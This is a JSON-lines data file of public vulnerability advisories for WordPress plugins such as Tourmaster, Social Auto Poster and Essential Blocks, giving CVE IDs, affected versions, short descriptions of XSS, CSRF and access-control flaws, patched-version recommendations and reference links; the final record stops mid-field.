{"CVE_ID":"CVE-2024-12400","slug":"tourmaster","versionImpact":"5.3.4","versionEndExcluding":"5.3.5","description":"The tourmaster WordPress plugin before 5.3.5 does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.","recommendation":"Update to version 5.3.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3542315c-93c3-41dd-a99e-02a38cfd58fb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3542315c-93c3-41dd-a99e-02a38cfd58fb\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3542315c-93c3-41dd-a99e-02a38cfd58fb\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3542315c-93c3-41dd-a99e-02a38cfd58fb\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11356","slug":"tourmaster","versionEndExcluding":"5.3.4","description":"The tourmaster WordPress plugin before 5.3.4 does not sanitise and escape some parameters when outputting them in the page, which could allow unauthenticated users to perform Cross-Site Scripting attacks.","recommendation":"Update to version 5.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d70df54e-e99e-4539-9fd9-002c0642137e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d70df54e-e99e-4539-9fd9-002c0642137e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1331","slug":"team-members","versionImpact":"5.3.1","versionEndExcluding":"5.3.2","description":"The Team Members WordPress plugin before 5.3.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the author role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 5.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2bac900-3d8f-406c-b03d-c8db156acc59\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b2bac900-3d8f-406c-b03d-c8db156acc59\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1664","slug":"essential-blocks","versionImpact":"5.3.1","versionEndExcluding":"5.3.2","description":"The Essential Blocks \u2013 Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Parallax slider in all versions up to, and including, 5.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250957\\\/essential-blocks\\\/tags\\\/5.3.2\\\/assets\\\/blocks\\\/parallax-slider\\\/frontend.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250957\\\/essential-blocks\\\/tags\\\/5.3.2\\\/assets\\\/blocks\\\/parallax-slider\\\/frontend.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6abfa01b-e2ec-412c-a17d-e8bd1f5ac228?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6abfa01b-e2ec-412c-a17d-e8bd1f5ac228?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10103","slug":"mailpoet","versionImpact":"5.3.1","versionEndExcluding":"5.3.2","description":"In the process of testing the MailPoet  WordPress plugin before 5.3.2, a vulnerability was found that allows you to implement Stored XSS on behalf of the editor by embedding malicious script, which entails account takeover backdoor","recommendation":"Update to version 5.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/89660883-5f34-426a-ad06-741c0c213ecc\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/89660883-5f34-426a-ad06-741c0c213ecc\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4038","slug":"back-in-stock-notifier-for-woocommerce","versionImpact":"5.3.1","versionEndExcluding":"5.3.2","description":"The The Back In Stock Notifier for WooCommerce | WooCommerce Waitlist Pro plugin for WordPress for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.3.1. This is due to the plugin for WordPress allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 5.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3080830%40back-in-stock-notifier-for-woocommerce&new=3080830%40back-in-stock-notifier-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3080830%40back-in-stock-notifier-for-woocommerce&new=3080830%40back-in-stock-notifier-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7f59489-9bff-4d22-8f99-6ea52d702ecf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7f59489-9bff-4d22-8f99-6ea52d702ecf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4482","slug":"amazon-auto-links","versionImpact":"5.3.1","versionEndExcluding":"5.3.2","description":"The Auto Amazon Links plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the style parameter in versions up to, and including, 5.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2961861%40amazon-auto-links%2Ftrunk&old=2896127%40amazon-auto-links%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2961861%40amazon-auto-links%2Ftrunk&old=2896127%40amazon-auto-links%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11ffb8a1-55d2-44c5-bcd2-ba866b94e8bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11ffb8a1-55d2-44c5-bcd2-ba866b94e8bc?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6756","slug":"social-auto-poster","versionImpact":"5.3.14","versionEndExcluding":"5.3.15","description":"The Social Auto Poster plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'wpw_auto_poster_get_image_path' function in all versions up to, and including, 5.3.14. This makes it possible for authenticated attackers, with Contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible. An attacker can use CVE-2024-6754 to exploit with subscriber-level access.","recommendation":"Update to version 5.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24e00c0d-08ff-4c68-a1dd-77b513545efd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24e00c0d-08ff-4c68-a1dd-77b513545efd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6755","slug":"social-auto-poster","versionImpact":"5.3.14","versionEndExcluding":"5.3.15","description":"The Social Auto Poster plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the \u2018wpw_auto_poster_quick_delete_multiple\u2019 function in all versions up to, and including, 5.3.14. This makes it possible for unauthenticated attackers to delete arbitrary posts.","recommendation":"Update to version 5.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9b1044d-6858-498f-9b89-352650061858?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9b1044d-6858-498f-9b89-352650061858?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6754","slug":"social-auto-poster","versionImpact":"5.3.14","versionEndExcluding":"5.3.15","description":"The Social Auto Poster plugin for WordPress is vulnerable to unauthorized modification of data to a missing capability check on the \u2018wpw_auto_poster_update_tweet_template\u2019 function in all versions up to, and including, 5.3.14. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary post metadata.","recommendation":"Update to version 5.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72934d2f-fd52-46d1-8cf9-9a20968899f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72934d2f-fd52-46d1-8cf9-9a20968899f7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6753","slug":"social-auto-poster","versionImpact":"5.3.14","versionEndExcluding":"5.3.15","description":"The Social Auto Poster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018mapTypes\u2019 parameter in the 'wpw_auto_poster_map_wordpress_post_type' AJAX function in all versions up to, and including, 5.3.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c268a6d-dfb4-4a9d-802e-80e5c1c53ca2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c268a6d-dfb4-4a9d-802e-80e5c1c53ca2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6752","slug":"social-auto-poster","versionImpact":"5.3.14","versionEndExcluding":"5.3.15","description":"The Social Auto Poster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018wp_name\u2019 parameter in the 'wpw_auto_poster_map_wordpress_post_type' AJAX function in all versions up to, and including, 5.3.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39b9e8a0-96bb-4b36-b4e8-ec9e3f137835?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39b9e8a0-96bb-4b36-b4e8-ec9e3f137835?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6751","slug":"social-auto-poster","versionImpact":"5.3.14","versionEndExcluding":"5.3.15","description":"The Social Auto Poster plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.3.14. This is due to missing or incorrect nonce validation on multiple functions. This makes it possible for unauthenticated attackers to add, modify, or delete post meta and plugin options.","recommendation":"Update to version 5.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7aceccc-7004-42f2-b085-eade9c45141c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7aceccc-7004-42f2-b085-eade9c45141c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6750","slug":"social-auto-poster","versionImpact":"5.3.14","versionEndExcluding":"5.3.15","description":"The Social Auto Poster plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 5.3.14. This makes it possible for unauthenticated attackers to add, modify, or delete post meta and plugin options.","recommendation":"Update to version 5.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36b58a4f-0761-4775-9010-9c77d4019c44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36b58a4f-0761-4775-9010-9c77d4019c44?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3472","slug":"modal-window","versionImpact":"5.3.9","versionEndExcluding":"5.3.10","description":"The Modal Window  WordPress plugin before 5.3.10 does not have CSRF check in place when bulk deleting modals, which could allow attackers to make a logged in admin delete them via a CSRF attack","recommendation":"Update to version 5.3.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d42f74dd-520f-40aa-9cf0-3544db9562c7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d42f74dd-520f-40aa-9cf0-3544db9562c7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"profit-button","versionEndExcluding":"5.3.1","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0940","slug":"profilegrid-user-profiles-groups-and-communities","versionEndExcluding":"5.3.1","description":"The ProfileGrid WordPress plugin before 5.3.1 provides an AJAX endpoint for resetting a user password but does not implement proper authorization. This allows a user with low privileges, such as subscriber, to change the password of any account, including Administrator ones.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/56744f72-2d48-4f42-8195-24b4dd951bb5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/56744f72-2d48-4f42-8195-24b4dd951bb5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10825","slug":"hide-my-wp","versionImpact":"5.3.01","versionEndExcluding":"5.3.02","description":"The Hide My WP Ghost \u2013 Security & Firewall plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the URL in all versions up to, and including, 5.3.01 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrative user into performing an action such as clicking on a link.","recommendation":"Update to version 5.3.02, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c467a634-d5cf-4e80-9a64-009cdad2a684?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c467a634-d5cf-4e80-9a64-009cdad2a684?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/tags\\\/5.3.01\\\/classes\\\/Tools.php#L633\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/tags\\\/5.3.01\\\/classes\\\/Tools.php#L633\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/tags\\\/5.3.01\\\/classes\\\/Tools.php#L638\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/tags\\\/5.3.01\\\/classes\\\/Tools.php#L638\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186489\\\/hide-my-wp\\\/trunk\\\/classes\\\/Tools.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186489\\\/hide-my-wp\\\/trunk\\\/classes\\\/Tools.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13803","slug":"essential-blocks","versionImpact":"5.2.3","versionEndExcluding":"5.3.0","description":"The Essential Blocks \u2013 Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018data-marker\u2019 parameter in all versions up to, and including, 5.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.3.0, or a newer patched version","refs":"[{\"url\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/essential-blocks\\\/assets\\\/admin\\\/editor\\\/editor.js\",\"name\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/essential-blocks\\\/assets\\\/admin\\\/editor\\\/editor.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242493\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242493\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efdeca40-e021-478f-af75-c5566ae70735?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efdeca40-e021-478f-af75-c5566ae70735?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13805","slug":"file-manager-advanced","versionImpact":"5.2.14","versionEndExcluding":"5.3.0","description":"The Advanced File Manager \u2014 Ultimate WordPress File Manager and Document Library Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 5.2.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted permissions by an Administrator, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 5.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_connector.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_connector.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249482\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249482\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fc6cc1b-7d49-48cd-9bce-d37c6dcfece9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fc6cc1b-7d49-48cd-9bce-d37c6dcfece9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4485","slug":"page-list","versionEndExcluding":"5.3","description":"The Page-list WordPress plugin before 5.3 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/685b068e-0727-45fb-bd8c-66bb1dc3a8e7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/685b068e-0727-45fb-bd8c-66bb1dc3a8e7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5218","slug":"g-business-reviews-rating","versionImpact":"5.2","versionEndExcluding":"5.3","description":"The Reviews and Rating \u2013 Google Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's file upload feature in all versions up to, and including, 5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71408e0b-aed8-4077-add2-7f3b249e85f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71408e0b-aed8-4077-add2-7f3b249e85f5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/g-business-reviews-rating\\\/tags\\\/5.1\\\/index.php#L804\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/g-business-reviews-rating\\\/tags\\\/5.1\\\/index.php#L804\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3092202%40g-business-reviews-rating%2Ftrunk&old=3076444%40g-business-reviews-rating%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3092202%40g-business-reviews-rating%2Ftrunk&old=3076444%40g-business-reviews-rating%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12500","slug":"philantro","versionImpact":"5.2","versionEndExcluding":"5.3","description":"The Philantro \u2013 Donations and Donor Management plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes like 'donate' in all versions up to, and including, 5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L107\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L140\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L140\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L167\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L167\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L203\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L203\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L229\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L229\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L398\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L398\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207274%40philantro&new=3207274%40philantro&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207274%40philantro&new=3207274%40philantro&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207777%40philantro&new=3207777%40philantro&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207777%40philantro&new=3207777%40philantro&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cd2ad77-c5de-470d-bc17-729233e4ab92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cd2ad77-c5de-470d-bc17-729233e4ab92?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2319","slug":"elisqlreports","versionImpact":"5.25.08","versionEndExcluding":"5.25.10","description":"The EZ SQL Reports Shortcode Widget and DB Backup plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions 4.11.13 to 5.25.08. This is due to missing or incorrect nonce validation on the 'ELISQLREPORTS_menu' function. This makes it possible for unauthenticated attackers to execute code on the server via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Version 5.25.10 adds a nonce check, which makes this vulnerability exploitable by admins only.","recommendation":"Update to version 5.25.10, or a newer patched 